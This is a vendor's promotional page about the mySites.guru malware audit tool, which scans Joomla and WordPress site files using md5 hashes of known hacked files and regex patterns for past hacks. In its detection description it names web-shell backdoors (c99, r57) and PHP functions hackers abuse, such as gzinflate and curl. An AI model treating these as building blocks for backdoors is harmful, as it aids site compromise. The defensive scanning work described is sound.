The average number of files in the 62,000+ sites connected to mySites.guru is just under 20,000 files. 😲
The mySites.guru suspect content tool is one of the suite of amazing unique tools in the audit art for the mySites.guru service.
This tool allows you to identify and review any files that we believe are suspect, or match our rules for other reasons
You can use this tool to see the “wood from the trees”, find the “needle in the haystack” – instead of manually looking through the 1million files in your website, we give you a short list to review.
Data Gathering – the mySites.guru audit
The start of the process is to run a mySites.guru audit.
This gathers information on every file in your webspace – with no exceptions. The audit process takes a short while but you can walk away from the screen and come back later.
For subscribers you can schedule audits to happen as often as you like or on demand
The audit first compiles a list of all the folders in your webspace – without exceptions – and then grabs a list of the files in those folders.
We then run an exhaustive process which includes:
- Identifying it the file is a core Joomla or WordPress file
- If it’s a core file, identifying if that file has been modified since release
- If the core file is modified, doing a comparison with the original file
- Storing the md5 hash of the file for future comparison
- Looping through every single line of code in every single file
- Searching every single line of code, for one of nearly 2000 patterns of previous hacks we have seen, and if found marking a file as “suspect”
- Checking the md5 hash of the file against over 14,000 specific md5 hashes of previously declared “hacked” files. There are no false positives, each of these 14,000 md5 hashes has been manually checked and confirmed to match a file which is hacked
- We check the created, modified and other metadata of each file, including the EXIF data on images (where hacks are known to reside!)
- We identify any encrypted files, PHP error logs, Archive files, files over 2mb in size, zero byte files and many other classifications
Once the audit is over we notify you so you can login to mySites.guru and review the results. The screenshot below shows the first three sections of the audit tab.
Check every line in every file
The audit process will look at every single line of every single file in your webspace without skipping any (apart from our own internal list of exceptions and whitelisted files/hashes/patterns)
The difference between us and other “scanners” is that they only look at the rendered output of your site, not all the files in your webspace. We even include files that are not used to render your site – known as backdoors – that could be hiding in your webspace unused for years before being identified and used by a hacker.
Suspect Content Match
The mySites.guru audit has several ways to identify suspect content.
The main two are:
- Over 2000 regex patterns based on historic hacks seen on real Joomla/WordPress sites over the years, including emerging hacks and mutated hacks seen in the last few weeks. These files are just suspect – there will be false positives by design – and not everything from this list will be bad, or hacks, or backdoors.
- Whole file hashes, that match the whole file, instantly marking these files as hacked, with a red [Hacked] label in the file tool results. These are normally backdoors and match hashes of files we have seen in the past.
Complete file match – md5 hash
When we discover a backdoor file (like c99, r57 or any file that is hacked) we calculate the md5 hash of the entire file and store that.
On the next audit of any site connected to mySites.guru, we distribute these new hashes and look for files in YOUR webspace that might match these.
If a file on your site matches any of our hashes then we will mark that with a red [HACKED FILE] flag in the audit results.
There are no false positives here. If the hash matches it IS a hacked file. Fact.
Single pattern match – Over 2000 regex patterns
The second level of detection is suspect content based on regex.
“regex” is a pattern based match based on over 2000 patterns we have curated over the last decade, and improve daily.
These find the normal things like use of
gzinflate on the same line and the other cool tricks that hackers use.
Our regex patterns find PARTS of hacks also, in this way a hacked file can be inspected on a line by line basis to find smaller snippets of hacks, where a file has been injected with a hack as opposed to the whole file being a whole hack/backdoor.
Not everything that match our patterns will be a hack! this is by design! The problem is, PHP is the language that your genuine code is written in and PHP is the language used by the hacks (mainly) and therefore you are both using the same language – for example, if you both spoke English, and we searched for the word “The” then there would be matches in both hacks and genuine code. However, we work very hard to reduce the number of genuine matches to a minimum – thus instead of you having to look at 20,000 files for a hack, you can identify and review a handful fo files that the mySites.guru audit identifies.
Reduce your time looking for hacks
The average site based on the 63,000 sites mySites.guru is connected to, has 19,882 files! That is a lot of files to manually sort through looking for hacks.
The results of the mySites.guru audit give you a handful of files to look through – what’s more, we give you an easy interface to view the exact lines of the exact files that we list – no need to fire up your FTP application or look through your file system manually.
If your file is a known backdoor for a hacker – we mark it as such!
By clicking any of the file names, you can see a preview of the section of the file we think is suspect. You can also see when it was modified, its size, and its permissions.
You can use our tools to edit the file directly in mySites.guru and then save the changes, and we will upload them to your site – no need to find your FTP Client! You can also delete the whole file with a single click.
Crowd Sourced Data Model
After every audit, the mySites.guru detection improves. Anonymous data on the suspect content found is submitted to our internal queue and after manual review is added to future iterations of our data model.
In plain language, this means if a new hack is found on a Joomla Site, then on the next audit of YOUR Joomla sites, we will look for that hack – this means by being connected to mySites.guru you benefit from all the knowledge gained in fixing and identifying hacks on all other sites.
This also allows us to track trends and waves of infections and improve the detection of new and mutated hacks and backdoors.
This data model improvement alone makes mySites.guru unique and sets us apart!
Detection Improves Daily
Across the mySites.guru service we run over 3000 audits of Joomla and WordPress sites per day (at the time or writing) – this means we always have up to date information on the very latest hacks and waves of backdoors seen across the world.
We find over 200 hacked sites a week.
What about false positives?
Not everything that match our patterns will be a hack!
This is by design!
The problem is, PHP is the language that your genuine code is written in and PHP is the language used by the hacks (mainly) and therefore you are both using the same language – for example, if you both spoke English, and we searched for the word “The” then there would be matches in both hacks and genuine code. However, we work very hard to reduce the number of genuine matches to a minimum – thus instead of you having to look at 20,000 files for a hack, you can identify and review a handful fo files that the mySites.guru audit identifies.
Can I whitelist files or folders?
To allow exceptions would defeat the inclusiveness of the tool and water down its effectiveness.
I expect you WILL get false positives, and that is fine, annoying but fine. You get these because we have chosen to show you rather than hide these files, just in case. Sometimes pattern matching is not enough and a human with experience in code needs to make a judgement call on a file (Feel free to ask me for a quick peek!)
You see, hackers use the same code that good developers use (Like curl, file_get_contents, $_GET etc…) – so sometimes it’s hard to tell if some code is evil, without context, and you cannot get context with a dumb tool that pattern matches.
We do not allow users to whitelist anything anymore
We used to, then it soon became clear that some users don’t have a clue what’s a hack and what’s not – and a user whitelisted everything and then sued us for not telling him his site was hacked. After legal fees we were £14,000 out of pocket.
Plus as mySites.guru uses crowdsourced data and machine learning, too many “fake” whitelists has a huge knock on effect to our integrity.
I personally am the only one that whitelists, and I do it rarely
The whole point of the tool, as it clearly explains, is to generate false positives as well as 100% exact matches – this way we also capture emerging hacks and extremely bad practice by extension developers.
Comparison to external “scanners”
Other services claim to have an “audit” tool. Most of the time they mean they have implemented the Sucuri SiteCheck API, which only “scans” your site as a visiting browser would, it doesn’t check the files in your webspace, and doesn’t find anything that is hidden under the surface of your rendered webpages. Be warned. Not all “Audits” are in-depth and comprehensive!Make sure you compare apples with apples. Not everyone claiming to be an “apple” is.
We currently (at the time or writing) do not scan database tables for malware – meaning that we will sometimes miss WordPress SQL injected posts. We are actively working on a solution for this.
BONUS: Out of your depth? Need help?
If the mySites.guru audit finds your Joomla or WordPress site is hacked, and you are unsure how to fix it with our tools, or just want us to take care of everything for you, you can escalate this to us using the service at https://fix.mysites.guru/ for SET FEE priced hack fixes.